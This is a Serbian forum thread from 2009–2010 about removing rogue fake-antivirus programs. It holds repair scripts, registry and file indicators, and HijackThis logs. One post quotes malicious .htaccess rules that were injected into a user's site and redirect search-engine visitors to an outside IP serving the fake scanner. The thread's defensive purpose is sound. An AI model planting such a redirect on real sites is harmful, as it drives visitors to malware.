2.Falio ti je fajl ??? NTLDR ? Ajmo... to moras da formatiras pa ti se brise sve sto ti je bilo na desktop-u npr. pa ti brise sve lepo instalirane programe i podesene, pa iz My Documents takodje se sve brise jer kod 99,99% korisnika MyDoc's stoji na "c:\Docume~1\korisnik\My Documents" i tu skladiste svoje podatke. GLUPOST!!! Jesi li cuo za Hiren'sBootCD ? Ili za XP Setup CD ? Ili jednostavno neki (bilo koji) linux. BILO STA STO MOZE DA SE BOOTA I STO MOZE DA TI "GLEDA" U DRAJVOVE MOZE DA TI RESI PROBLEM ZA DESET MINUTA. U to budi uveren.

3.FORMATIRANJE NIJE NAJBOLjE RESENJE. (Osim u slucajevima gde je to neophodno, u ovom slucaju SIGURNO nije) Par poteza ili tacnije par desetina poteza i racunar ti je nov. Treba samo upregnuti vijugu.

4.Instaliranje svih tih cudesa dodatno usporava racunar. Zasto? Evo... Svaki od tih antivirusa itd. programa ima svoj "kernel" koji se ucitava pri boot-u i ima svoj "ControlCenter" koji se startuje pri login-u usera. Svaki od njih zauzima po "neki" procenat procesora ram-a, ovoga, onoga... i takvo usporenje se da primetiti. Naravno sad ce mnogi reci: "Meni komp radi isto...", "Ja imam core2qad :) bla bla truc..." i jos neke budalastine, ali oni ne znaju da postoji jos korisnika sa dosta slabijim konfiguracijama a kod takvih se bogami oseti. Naravno ovi isti, pretpostavljam laici ce reci: "Pa zasto ne kupe bolji...". Glupost. Da ne skrecem sa teme.

5.Kazu: "Proba se ne placa" ali se zato nekad i opeces. Licno meni rootkit RootkitRevealer napravio problem, dok sam npr. njega koristio na bezbroj mesta i odradjivao posao. Nemam nista protiv rootkita. Korisne su to alatke. Samo treba obratit paznju sta koristiti i ODAKLE GA SKIDATE.


1. Sto se tice prvog. Mozes da iskljucis page na x i nemas brige sve dok je neko ne nadje u history. Dakle posle toga obrisi history.

2. Spomenuo sam "BILO STA STO MOZE DA BOOTA...". Da. Kako povratiti ntldr?
a. Hiren'sBootCD.
Startuj dos iz njega i prebaci fajl na c:\. Mozes ga naci u "C:\WINDOWS\ServicePackFiles\i386" ako imate instaliran service pack, ili ga prekopirati sa necijeg racunara, dakle fles. Fles mora biti na usb portu pri bootu cd-a.
b. XP Setup CD.
Ubacite setup disk i kad vas lepo pita da li zelite da instalirate svezu kopiju win-a ili da ukljucite recovery konzolu vi odaberite drugo. Dakle pritisnete R i otvara Vam se RecoveryConsole, vidi se kao DOS... ajd. Pitace Vas u koji Win zelite da se ulogujete. Verovatno ce biti samo jedan tako da pritisnete 1 i enter. Unesite password ako je potreban, ako ne samo Enter i pocnite sa vracanjem podataka.
Pretpostavljam da cete do tad nauciti osnovne komande u dos-u.
fajl NTLDR se nalazi u "CD-Rom:\I386" gde je CD-Rom "Slovo" koje ga predstavlja. Uzecemo da je to "E:\".
Kucamo sledece: copy "E:\I386\ntldr" "C:\ntldr" Ista stvar i za ntdetect.com jer i njega virusi brisu u paketu sa ntldr.
c. Bilo koji Linux. Verujte mi, ovo je igra za malu decu. Ovde cak i ne moras da kucas copy... vec sve radis desni klik pa copy kao i u Win-u. Ovo ne zelim da Vam objasnjavam. Bilo bi jako nisko. A zeljene fajlove cete naci na vec pomenutim lokacijama.

3. Ako ne mozes otvoriti regedit to je razlog sledeceg (ovo vazi i za task manager):
a. Virus je sebe postavio za regedit-ov debugger.
b. Virus je zabranio pristup regedit-u.
c. Virus je obrisao regedit. Moze se vratiti iz foldera "C:\WINDOWS\ServicePackFiles\i386", "%systemroot%\system32\dllcache" ili sa setupCD u folderu "..\I386\regedit.exe" kao i sa flesa. Postoji milion kombinacija za to.
Sledeca VBS skripta Vam moze MNOOGOOO pomoci.

''''''''''''''''''''''''''''''''''''''''''''''''
On Error Resume Next
Set Skripta = WScript.CreateObject("WScript.Shell")

'Brisanje zabrane za task manager iz Policies:
Skripta.RegDelete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr"
Skripta.RegDelete "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr"

'Brisanje zabrane za regedit iz policies:
Skripta.RegDelete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools"
Skripta.RegDelete "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools"

'Brisanje debuggera za oba:
Skripta.RegDelete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe\debugger"
Skripta.RegDelete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\debugger"

'Pokrece TaskMgr i Regedit
Skripta.run "taskmgr.exe"
Skripta.run "regedit.exe"
''''''''''''''''''''''''''''''''''''''''''''''''''''''''
Otvorite Notepad i prekopirajte gornji text a zatim sacuvajte kao VBS. Kako? File, Save As, zatim u nazivu stavite "skripta.vbs" a dole u Save As Type neka bude "All Files", save. Posle starta vbs fajla pokrenuce Vam se i taskmanager i regedit

Kad Vam se startuje regedit mozete da pretrazujete po njemu. Sta? Sve veze koje postoje sa doticnim "Skotom". Kako?
Preporucujem da skinete ProcesExplorer jer Vam on omogucuje da vidite iz kog fajla se izvrsava nezeljeni proces kao i njegov ImageName koji cete koristiti u pretrazi kroz registre. Mozete ga skinuti sa www.sysinternals.com iliti http://www.microsoft.com/technet/sysinternals sto mu dodje isto. Prvi je redirektovan na drugi. :)
Dakle, u ProcesExplorer-u vidite sta Vam smeta i krenite u potragu. Najbolje da zapisete ImageName tih virusa pa da ih odmah iskljucite iz procesa i naravno obrisite fajl (Ime fajla se vidi po zadrzavanju misa iznad zeljenog procesa ili desni klik properties). Dalje, gde god da nadjete njegov ImageName (u registrima) brisite ga ali pre toga napravite backup tog kljuca u kome se nalaze i ostale informacije verovatno bitne za Vas racunar kako bi u slucaju neke greske mogli da vratite na svoje mesto.

ZNAM DA VAS SMARAM ALI ISPLATICE VAM SE !!!

Bitno je takodje da nadjete veze koje mogu biti oblika npr. {6e93bcf0-aa4a-11dc-b23d-001d60027d3c} pa pretraziti registre sa takvim oblikom i obrisati. Napraviti backup.
Ovo Vam moze posluziti kao zlatni tutorial za sve buduce ne daj boze viruse.

4. Necu da komentarisem. Savet je izmedju redova.
5. To je Vasa stvar. Rootkit pomaze ali u ovom slucaju nije potreban.

Molim sve Vas da obratite paznju na ovo. Ako ko opet ima problema neka se javi ovde ili neka salje mail na [email protected]. Vrlo rado cu pomoci. Jos jedna mogucnost:
TeamViewer je zlatan programcic za remote desktop. Ako ko zeli mogu i preko njega da ja sam otklonim problem.
Sto se placanja tice... :) :) Sala. Popij koje pivo za mene ili sta vec. Nadam se da Vas nisam udavio ovolikim textom a siguran sam da je od pomoci. Hvala! Pozdrav svima!!!

[Ovu poruku je menjao cyberdjomla dana 16.01.2009. u 13:14 GMT+1]
[ wux @ 16.01.2009. 23:34 ] @
Evo iskustva sa prijateljicinim laptop-om:

Antivirus2009 nije dozvoljavao instaliranje bilo čega što može da ga ukloni, a ono što je puštao nije uspevalo da ga detektuje.
Probao sam na foru i uspelo je: promenio sam ime setup fajla Malwarebytes' Anti-Malware u xxx.exe i instalacija je prošla, ali nije hteo da ga startuje. Onda sam promenio i ime izvršnog fajla i uspeo je da se pokrene i ukloni napast...
Nakon istalacije Avast Free pustio sam ga da uradi boot time (ili kako se već zove) i našao je još neke zaostatke u restore fajlovima, a mislim da ću instalirati još nekoliko AV u trial modu i proveriti za svaki slučaj...
[ cyberdjomla @ 17.01.2009. 01:35 ] @
Virus je sebe postavio za AntiMalware-ov debugger.
Uradi ono sa skriptom gore samo promeni regedit.exe u ime tog fajla sto nece da se pokrene. Radice sigurno.
Javi sta je bilo. Pozz.
[ cyberdjomla @ 18.01.2009. 06:22 ] @
Posto ga nema u temama, ajd. da ga ubacimo.
Antivitus 2010 je slican svojim prethodnicima Antivirus 2009 i 2008. Izbacuje porukicu, pa kao nesto skenira, pa se ti uplasis pa kliknes na "Scan Now" pa ti on prebaci neki fajlic, pa ti to pokrenes pa te onda davi i nemas zivaca zato sto te udavi nekim porukama kako imas neki spyware i neko jos cudo...







Poruka surferima: "ISKULIRAJTE STRANICU", zatvorite je i obrisite je iz history da se nebi neko zeznuo pa je "Slucajno" pokrenuo sa vaseg kompa.
Updatujte svoje antiviruse firewall-ove itd.


Svoje fajlove smesta u Program Files "AV2010\AV2010.exe" i "AV2010\svchost.exe" a u system32 stvara "wingamma.exe", "IEDefender.dll" i "wingamma.exe"
Postavlja precice na "desktop" i u "start menu"


Upisuje registre u (oni koje sam nasao):

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "Windows Gamma Display"
HKEY_CLASSES_ROOT\Interface\{7BC7565C-5062-43CE-8797-DC2C271140A9}
HKEY_CLASSES_ROOT\TypeLib\{705FD64B-2B7B-4856-9337-44CA1DA86849}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{FC8A493F-D236-4653-9A03-2BF4FD94F643}
HKEY_CLASSES_ROOT\AppID\IEDefender.DLL
HKEY_CLASSES_ROOT\AppID\{3C40236D-990B-443C-90E8-B1C07BCD4A68}
HKEY_CLASSES_ROOT\CLSID\{FC8A493F-D236-4653-9A03-2BF4FD94F643}
HKEY_CLASSES_ROOT\IEDefender.IEDefenderBHO
HKEY_CLASSES_ROOT\IEDefender.IEDefenderBHO.1

Moguce da sam nesto izostavio.

ZDRAVO!




[Ovu poruku je menjao cyberdjomla dana 18.01.2009. u 08:29 GMT+1]
[ m.alexandar @ 19.01.2009. 07:22 ] @
Citat:
dimnicar: Sto se tice antivirusa 2009 ne slazem se sa onima koji kazu da mora da se pritisne yes da bi se instalirao.
Cak i ako ga kanselises on pocinje da skenira,govoreci pri tom da je zarazen ceo komp i da sve treba brisati.Evo mene je ovih dana upravo napao.,ali mu uspesno odolevam.
u kasperskom sam chekirao enable file antivirus i web antivirus stavio ih na maximum,anti pishing i antidiler su mi takodje enabled,i za sada se dosadni skot ne pojavljuje. Taj skot se ne mora aktivirati sa "YES,YES,YES" dugmetom. Dovoljno je da ti neko postavi link "koji te vodi ka necemu sto ti trazis",a u stvarnosti te odvede do linka antivirus 2009,Mozes i da mu stisnes dugme NO,ili da ga kenselise Gospodin SKOT pocinje da skenira.Ako se to desi ,diskonnektuj se i restartuj sistem da zeznes skota,a zatim probaj da cekiras u kasperskom ona polja enable...... Eto mene skot za sada vise ne uznemirava.



za sve ostalo tu je alt + f4

[ colja29 @ 27.01.2009. 11:24 ] @
Naj-jednostavniji nacin da se oslobodite tih napasti je free program http://siri.urz.free.fr/Fix/SmitfraudFix.exe SmitfraudFix opsirnije o programu http://siri.urz.free.fr/Fix/SmitfraudFix.php ovde
Vrlo jednostavan program,mora se pokrenuti iz safe moda !
Mene je nekoliko puta spasao ponovne instalacije Windowsa

A pisano je o tome i u temi http://www.elitesecurity.org/t306716-0
[ Miroslav-BL @ 28.01.2009. 13:48 ] @
Pre tri dana sam imao problem sa Antivirus 2010.

Nakon brisanja raznih gluposti sa racunara pomocu programa CCleaner, zatim skeniranjem uz pomoc KIS 2009 i SpyBot, nakon 3-4 puta nije se vise pojavljivao. Sva tri programa su bili poslednje verzije.

Verujem da je ovo resilo problem.
[ stevicad @ 07.02.2009. 12:36 ] @
Licno imam problema vezano za ovaj lazni antivirus, ali sa druge strane...

Kada sam slucajno potrazio adresu drugara ,preko google-a, (kojem inace "ustupam" deo svog hostinga) naravno pojavi se i meni taj cuveni "Antivirus" kao pop-up....dalje je sve jasno.

E sad uzrok je to sto se u .htaccess fajl koje se obicno nalazi na istom mestu na serveru gde i Index.html promenjen, i to tako da tek kada ga otvorim (text) i skrolujem poprilicno "dole" (posto je na prvi pogled dokument prazan...)neko ubacio maliciozni kod sledece sadrzine:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://87 .248.180.90/in.html?s=ipw2 [R,L]


Ja sam do sada vec nekoliko puta promenio (obrisao) ovaj kod, ostavljajuci prazan .htaccess dokument, promenuo svoju FTP sifru, nakon cega je jedno vreme sve ali sledece jutro opet stari kod....i redirekcija na "skeniranje" racunara....

Trenutno je ok, ali videcu ujutu...
[ Nemanja Živanović @ 17.03.2009. 15:10 ] @
Anti-virus-1 je relativno novi Rouge Antivirus program (lazni antivirus) slican programima kao sto su Antivirus 2010. i Antivirus 360.




================================
Uklanja se sa Malwarebytes` Antimalware.
================================



U HijackThis logu pojavljuju se sledeci fajlovi:

Citat:
O1 - Hosts: 217.20.175.74 www.review.2009softwarereviews.com
O1 - Hosts: 217.20.175.74 review.2009softwarereviews.com
O1 - Hosts: 217.20.175.74 a1.review.zdnet.com
O1 - Hosts: 217.20.175.74 www.d1.reviews.cnet.com
O1 - Hosts: 217.20.175.74 www.reviews.toptenreviews.com
O1 - Hosts: 217.20.175.74 reviews.toptenreviews.com
O1 - Hosts: 217.20.175.74 www.reviews.download.com
O1 - Hosts: 217.20.175.74 reviews.download.com
O1 - Hosts: 217.20.175.74 www.reviews.pcadvisor.c.uk
O1 - Hosts: 217.20.175.74 reviews.pcadvisor.co.uk
O1 - Hosts: 217.20.175.74 www.reviews.pcmag.com
O1 - Hosts: 217.20.175.74 reviews.pcmag.com
O1 - Hosts: 217.20.175.74 www.reviews.pcpro.co.uk
O1 - Hosts: 217.20.175.74 reviews.pcpro.co.uk
O1 - Hosts: 217.20.175.74 www.reviews.reevoo.com
O1 - Hosts: 217.20.175.74 reviews.reevoo.com
O1 - Hosts: 217.20.175.74 www.reviews.riverstreams.co.uk
O1 - Hosts: 217.20.175.74 reviews.riverstreams.co.uk
O1 - Hosts: 217.20.175.74 www.reviews.techradar.com
O1 - Hosts: 217.20.175.74 reviews.techradar.com
O2 - BHO: QWProtectBHO - {70FEAD04-A7FD-4B89-B814-8A8251C90EF7} - C:\Documents and Settings\All Users\Application Data\AV1\QWProtect.dll
O4 - HKLM\..\Run: [Monitor calibration] C:\Documents and Settings\All Users\Application Data\AV1\AV1i.exe


Na racunaru se pojavljuju sledeci fajlovi:

Citat:
c:\Documents and Settings\All Users\Application Data\AV1
c:\Documents and Settings\All Users\Start Menu\Programs\Anti-virus-1
c:\Documents and Settings\All Users\Application Data\AV1\AV1.cab
c:\Documents and Settings\All Users\Application Data\AV1\av1.exe
c:\Documents and Settings\All Users\Application Data\AV1\AV1i.exe
c:\Documents and Settings\All Users\Application Data\AV1\AV1i2.exe
c:\Documents and Settings\All Users\Application Data\AV1\QWProtect.dll
c:\Documents and Settings\All Users\Application Data\AV1\svchost.exe
c:\Documents and Settings\All Users\Desktop\Anti-virus-1.lnk
c:\Documents and Settings\All Users\Start Menu\Programs\Anti-virus-1\Anti-virus-1.lnk
c:\Documents and Settings\All Users\Start Menu\Programs\Anti-virus-1\Uninstall.lnk


U Registry bazu upisuju se sledeci kljucevi:

Citat:
HKEY_CURRENT_USER\Software\AV1
HKEY_CURRENT_USER\Software\AV1\AV1\{F275E931-AFEC-4f70-B0D4-CC2731B945E0}
HKEY_CLASSES_ROOT\AppID\{29256442-2C14-48CA-B756-3EE0F8BDC774}
HKEY_CLASSES_ROOT\AppID\QWProtect.DLL
HKEY_CLASSES_ROOT\CLSID\{70FEAD04-A7FD-4B89-B814-8A8251C90EF7}
HKEY_CLASSES_ROOT\Interface\{051C9A06-FB08-486F-B09B-8B33B261637D}
HKEY_CLASSES_ROOT\QWProtect.QWProtectBHO
HKEY_CLASSES_ROOT\TypeLib\{512E801E-2F02-4ADE-ACAA-58F08A22B2F8}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{70FEAD04-A7FD-4B89-B814-8A8251C90EF7}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "Monitor calibration"


Posle uklanjanja ovog Rouge-a sa MBAM-om, obavezno pogledajte da li su navedeni fajlovi ili regisry kljucevi slucajno ostali na racunaru.

[Ovu poruku je menjao Nemanja Živanović dana 31.03.2009. u 12:41 GMT+1]
[ Nemanja Živanović @ 17.03.2009. 15:25 ] @
Spisak novih Rouge programa:

ANG AntiVirus 09
Virus Remover 2009
WinCleaner 2009
PrivacyGuardPro
Total Virus Protection





Svi navedeni Rouge programi uklanjaju se sa Malwarebytes` Antimalware. Zahvaljujem se sajtu www.bleepingcomputer.com na korisnim informacijama.
[ Nemanja Živanović @ 22.03.2009. 17:16 ] @
Upustvo za uklanjanje Rouge programa alatom SmitFraudfix:

• Preuzmite SmitFraudfix na Desktop
• Restartujte racunar u Safe Mode
• Pokrenite program SmitFraudfix duplim klikom na ikonicu
• Pokrece se ekran Credits (pritisnite bilo koje dugme da nastavite)
• Sada se otvara izbor gde cete pritisnuti 2 (to ce oznaciti da proces ciscenja pocinje)
• Program ce poceti da cisti racunar kroz nekolio faza i kada zavrsi pokrenuce se Disk Cleanup program (da ocisti Temp, Temporary Internet Files...)
• Kad se ovaj proces zavrsi pojavice se ekran gde cete biti upitani: Do you want to clean the registry ? (y/n) - tu pritisnite Y pa Enter
• Kada se ovi procesi zavrse pojavice se crveni ekran sa porukom Computer will reboot now. Close all applications i pritisnute spacebar (razmaklicu na tastaturi) da potvrdte
• Racunar ce se tada restartovati u normalan rezim rada i automatski ce se pojaviti Notepad sa izvestajem.
[ Nemanja Živanović @ 30.03.2009. 23:30 ] @
Upustvo za uklanjanje "System Security" Rouge Antivirusa

Imao sam malo slobodnog vremena pa sam napravio video upustvo za uklanjanje System Security Rouge antivirusa. U principu, ovo upustvo vazi za uklanjanje vecine Rouge softvera:



Preuzimanje alata prikazanih u video tutorijalu:
SmitFraudFix
HijackThis

Bilo bi pozeljno da posle ovakvog uklanjanja racunar skenirate sa programom Malwarebytes` Antimalware. Sve nedoumice, pitanja i analizu loga mozete postaviti na forumu, otvaranjem nove teme.
[ Boban1961 @ 12.05.2009. 09:45 ] @
Najveći je problem panika!!!
Jer se svi uspaniče kad ga zakače AV 360
Simulira pad sistema to jest plavljenje ekrana
na kom piše belim slovima:
Kompjuter je restartovao- pao pre negon što se naka komponenta ošteti!
Ali je to samo čuvar ekrana, nije ni u ludilu plavljenje ekrana tj. pad sistema!

On ide u više relacija u Sistem 32 u Program Files, Documents and Setings Aplikacije
u My Documents i na C:
Ako nemaš 2 OS instalirana
Restartuješ komp
Ubaciš bootabilan Partition Magic
Napraviš još jednu sistemsku particiju 10 GB
Restartuješ računar.
Ubaciš Bootabilan CD XP i instalirašna tu pripremljenu particiju
instaliraš Driver za grafičku i podršku za matičnu...
Kad si to uradio možeš da pređeš na stvar
Ideš na opciju pretraži na C: particiji i AV 360 i kučence ili Merlin će da pronađu sve gde se instalirao!!!
Imaćeš uvek jedan rezervni operativni sistem za takve slučajeve

PS. Prilikom instalacije odaberi ćirični widows na svim nivoima ako obraćuješ titlove
filmova da bi mogao da sačuvaš ćirilicu kao ANSI 8-o bitni text jer samo 8-o bitni text čitaju DivX player-i

Ja uvek imam 3 Operativna sistema
1. Win XP Latinični SP2 ili 3
2.Win XP Ćirilica SP2 ili 3
3.Win XP bez servis packa
jer jedino njegov Explrer vidi prazan DVD
4.LINUX

[ Jagnjeca brigada @ 05.10.2009. 12:31 ] @
Meni se javio lazni Antivirus 2010, i ako sam imao "NOD32 v 2.7" updejtovan sa najnovijim definicijama i jos pride "AdMuncher" naravno bio IE7. Problem sam resio samo samo sa System Restore, to je bilo pre tri dana i jos se nije povratio.

[Ovu poruku je menjao Jagnjeca brigada dana 05.10.2009. u 14:06 GMT+1]
[ Zoran Rodic @ 05.10.2009. 12:39 ] @
ZAista ne razumem poriv da neko koristi v2,7

To je isto kao da nemaš antivirus na računaru.
Bolje stavi besplatnu Aviru
[ Jagnjeca brigada @ 05.10.2009. 13:13 ] @
Nisam imao problema sa virusima godinama, 2.7 koristim jer ne opterecuje racunar (stariji racunar je u pitanju). Ne znam kako nije detektovao ovaj lazni virus, verovatno jer prepoznaje samo prave viruse :)


[ reb0rn @ 05.10.2009. 13:34 ] @
Politika svake AV kompanije je da stare verzije totalno zapostave i nateraju korisnike da plate i predju na nove verzije jer inace kako bi im uzeli kes.. tako da NOD 2.7 trenutno skoro nista ne radi po pitanju novih napasti..
[ Zoran Rodic @ 05.10.2009. 13:50 ] @
Ok, da ne idemo u off topic .... preusmerio bih dalju diskuju na sledecu temu
http://www.elitesecurity.org/t...eba-ili-razbacivanje-resursima
[ Jagnjeca brigada @ 25.10.2009. 11:51 ] @
Evo sta kaze Microsoft za lazni antivirs:

Important note about fake antivirus
Reports of rogue antivirus programs have become more prevalent lately. These are programs that generate misleading alerts and false detections of malcode in order to convince users to purchase the illegitimate security software. For example, programs such as Trojan:Win32/Antivirusxp and Program:Win32/FakeRednefed may display product names or logos in an apparent unlawful attempt to impersonate Microsoft products. These products may represent themselves as "Antivirus XP", "AntivirusXP 2008", "WinDefender 2008", "XP Antivirus", etc.
If you believe your machine is affected by malicious software or potentially unwanted software, you can use Windows Live safety scanner or another up-to-date scanning and removal tool to detect and remove malware or other potentially unwanted software from your computer. For more information on Microsoft security products, please visit our security products and services website. Additionally, you can get virus-related assistance at no additional charge from Microsoft in the United States and Canada via a toll-free support hot line, (866) PC-SAFETY (727-2338). For support outside the United States and Canada, please contact Microsoft Help and Support worldwide.

http://www.microsoft.com/windo...infamily/defender/default.mspx


oni preporucuju ovo:

http://onecare.live.com/site/en-us/default.htm
[ Catch 22 @ 14.04.2010. 20:48 ] @
Zgodan mali programčić čije ime sve govori Remove Fake Antivirus 1.63

Citat:
Remove Fake Antivirus 1.63 is used to remove:

•Antivirus 7
•CleanUp Antivirus
•Security Central
•Security Antivirus
•Total PC Defender 2010
•Vista Antivirus Pro 2010
•Your PC Protector
•Vista Internet Security 2010
•XP Guardian
•Vista Guardian 2010
•Antivirus Soft
•XP Internet Security 2010
•Antivir 2010
•Live PC Care
•Malware Defense
•Internet Security 2010
•Desktop Defender 2010
•Security Tool
•Antivirus Live
•Personal Security
•Cyber Security
•Alpha Antivirus
•Windows Enterprise Suite
•Security Center
•Control Center
•Braviax
•Windows Police Pro
•Antivirus Pro 2010
•PC Antispyware 2010
•FraudTool.MalwareProtector.d
•Winshield2009.com
•Green AV
•Windows Protection Suite
•Total Security 2009
•Windows System Suite
•Antivirus BEST
•System Security
•Personal Antivirus
•System Security 2009
•Malware Doctor
•Antivirus System Pro
•WinPC Defender
•Anti-Virus-1
•Spyware Guard 2008
•System Guard 2009
•Antivirus 2009
•Antivirus 2010
•Antivirus Pro 2009
•Antivirus 360
•MS Antispyware 2009
•IGuardPC or I Guard PC
•Additional Guard

(all of them are fake antivirus which are viruses or trojans) from your computer.

Remove Fake Antivirus is used to remove fake antivirus which are viruses or trojans.


Download links (190KB):

Link I

Link II

md5: 5c960426d4ecf45beda3f1f0bbe33dd7




[Ovu poruku je menjao Zoran Rodic dana 15.04.2010. u 08:08 GMT+1]
[ Goran Mijailovic @ 05.06.2010. 16:25 ] @
http://freeofvirus.blogspot.com/

Remove Fake Antivirus 1.65 is used to remove:

1. Security Tool
2. Antivirus 7
3. CleanUp Antivirus
4. Security Toolbar
5. Digital Protection
6. XP Smart Security 2010
7. Antivirus Suite
8. Vista Security Tool 2010
9. Total XP Security
10. Security Central
11. Security Antivirus
12. Total PC Defender 2010
13. Vista Antivirus Pro 2010
14. Your PC Protector
15. Vista Internet Security 2010
16. XP Guardian
17. Vista Guardian 2010
18. Antivirus Soft
19. XP Internet Security 2010
20. Antivir 2010
21. Live PC Care
22. Malware Defense
23. Internet Security 2010
24. Desktop Defender 2010
25. Antivirus Live
26. Personal Security
27. Cyber Security
28. Alpha Antivirus
29. Windows Enterprise Suite
30. Security Center
31. Control Center
32. Braviax
33. Windows Police Pro
34. Antivirus Pro 2010
35. PC Antispyware 2010
36. FraudTool.MalwareProtector.d
37. Winshield2009.com
38. Green AV
39. Windows Protection Suite
40. Total Security 2009
41. Windows System Suite
42. Antivirus BEST
43. System Security
44. Personal Antivirus
45. System Security 2009
46. Malware Doctor
47. Antivirus System Pro
48. WinPC Defender
49. Anti-Virus-1
50. Spyware Guard 2008
51. System Guard 2009
52. Antivirus 2009
53. Antivirus 2010
54. Antivirus Pro 2009
55. Antivirus 360
56. MS Antispyware 2009
57. IGuardPC or I Guard PC
58. Additional Guard



[Ovu poruku je menjao Goran Mijailovic dana 05.06.2010. u 18:57 GMT+1]
[ Goran Mijailovic @ 05.06.2010. 17:16 ] @
Sysinternals Antivirus je novost, juce sam ga uklonio pomocu uputsva koje je objavljeno ovde: http://www.myantispyware.com/2...rnals-antivirus-removal-guide/

Step 1. Repair “running of .exe files”.

Click Start, Run. Type command and press Enter. Command console “black window” opens. Type notepad as shown below

Command console

Press Enter. Notepad opens. Copy all the text below into Notepad.

Code:
Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\exefile\shell\open\command]
@="\"%1\" %*"

Save this as fix.reg to your Desktop (remember to select Save as file type: All files in Notepad.) Double Click fix.reg and click YES for confirm.
Reboot your computer.

If you can`t create fix.reg, then download fix.zip from here, http://www.myantispyware.com/wp-content/uploads/2010/05/fix.zip unzip it. Double Click fix.reg and click YES for confirm. Reboot your computer.

Step 2. Remove Sysinternals Antivirus associated malware.
Download MalwareBytes Anti-malware (MBAM). Once downloaded, close all programs and windows on your computer.

Double-click on the icon on your desktop named mbam-setup.exe. This will start the installation of MalwareBytes Anti-malware onto your computer. When the installation begins, keep following the prompts in order to continue with the installation process. Do not make any changes to default settings and when the program has finished installing, make sure a checkmark is placed next to “Update Malwarebytes’ Anti-Malware” and Launch “Malwarebytes’ Anti-Malware”. Then click Finish....

When the scan is finished a message box will appear that it has completed scanning successfully. Click OK. Now click “Show Results”. You will see a list of infected items similar as shown below.
Note: list of infected items may be different than what is shown in the image below.

Malwarebytes Anti-malware, list of infected items

Make sure all entries have a checkmark at their far left and click “Remove Selected” button to remove Sysinternals Antivirus. MalwareBytes Anti-malware will now remove all of associated Sysinternals Antivirus files and registry keys and add them to the programs’ quarantine. When MalwareBytes Anti-malware has finished removing the infection, a log will open in Notepad and you may be prompted to Restart.

Note 1: if you can not download, install, run or update Malwarebytes Anti-malware, then follow the steps: Malwarebytes won`t install, run or update – How to fix it.

Note 2: if you need help with the instructions, then post your questions in our Spyware Removal forum.

Note 3: your current antispyware and antivirus software let the infection through ? Then you may want to consider purchasing the FULL version of MalwareBytes Anti-malware to protect your computer in the future.
Sysinternals Antivirus creates the following files and folders

C:\Program Files\Sysinternals Antivirus
%UserProfile%\Start Menu\Programs\Sysinternals Antivirus
C:\Program Files\Sysinternals Antivirus\Sysinternals Antivirus.exe
C:\Program Files\adc_w32.dll
%UserProfile%\Start Menu\Programs\Sysinternals Antivirus\Sysinternals Antivirus.lnk
%UserProfile%\Desktop\Sysinternals Antivirus.lnk
C:\Program Files\alggui.exe
C:\Program Files\svchost.exe
C:\Program Files\skynet.dat
Sysinternals Antivirus creates the following registry keys and values

HKEY_CLASSES_ROOT\CLSID\{149256d5-e103-4523-bb43-2cfb066839d6}
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{149256d5-e103-4523-bb43-2cfb066839d6}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{149256d5-e103-4523-bb43-2cfb066839d6}
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\adbupd
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_ADBUPD
HKEY_USERS\.DEFAULT\Software\Sysinternals Antivirus
HKEY_CURRENT_USER\Software\Sysinternals Antivirus